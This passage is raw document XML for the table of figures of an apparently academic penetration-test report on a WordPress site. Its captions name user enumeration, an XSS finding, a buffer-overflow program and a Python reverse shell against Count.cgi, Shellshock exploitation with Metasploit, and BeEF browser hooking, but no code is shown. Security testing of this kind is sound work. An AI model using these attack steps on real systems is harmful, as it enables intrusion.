          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5: Source Code from the Hidden Directory /wp-json/</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134070 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F990A34" w14:textId="02B6FC39" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134071" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 6: Backend Database Information of the Target Website Found in /wp-json/wp/v2/users Directory</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134071 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D294695" w14:textId="5611E20D" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134072" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 7: Webserver Security Hardened by Tevel Cyber</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134072 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="738585DC" w14:textId="0A400859" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134073" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8: Secure WordPress User Login Control Panel Found</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134073 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="646D50EA" w14:textId="03CC745B" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134074" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9: Secure E-Mail Server Login Hidden Page Found</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134074 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50C614EC" w14:textId="6C34A3BC" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134075" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10: Robots.txt File Found within Hidden Directory</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134075 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A1D7B7F" w14:textId="3B8DEAE3" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134076" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11: Sitemap.xml Located within a Hidden Directory</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134076 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3817A834" w14:textId="07DB1E26" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134077" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12: Secure WordPress Login Page Located within a Hidden Directory</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134077 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E9CB066" w14:textId="07F6429F" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134078" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13: Suspicious PHP Page found with Possible XSS Vulnerability</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134078 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C282D44" w14:textId="1FEBE641" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134079" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 14: CGI C Programme Created for Buffer Overflow Attack Against Count.cgi Script</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134079 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C5D7F6B" w14:textId="5327C1C4" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134080" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 15: Reverse BASH Shell Script Created in Python to Exploit Count.cgi Script</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134080 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79EDED0E" w14:textId="12E190FE" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134081" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 16: Metasploit Framework Utilised to Exploit Shellshock Vulnerability</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134081 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37AC3357" w14:textId="29854D2F" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134082" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 17: Beef Webserver Installed on Attacker Machine</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134082 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="643A50D1" w14:textId="5A370E9E" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134083" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 18: Beef Hook Utilised on Target Website Using the Beef Bind Shell Module</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134083 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C3B5551" w14:textId="4671F731" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134084" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 19: Target Website Hooked with Persistent Session Beef Zombie</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134084 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B44D3C6" w14:textId="26F53848" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134085" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 20: Beef CLI Webserver logs Show Exploit was Successful</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134085 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A7D3A7C" w14:textId="17D79A6A" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134086" w:history="1">
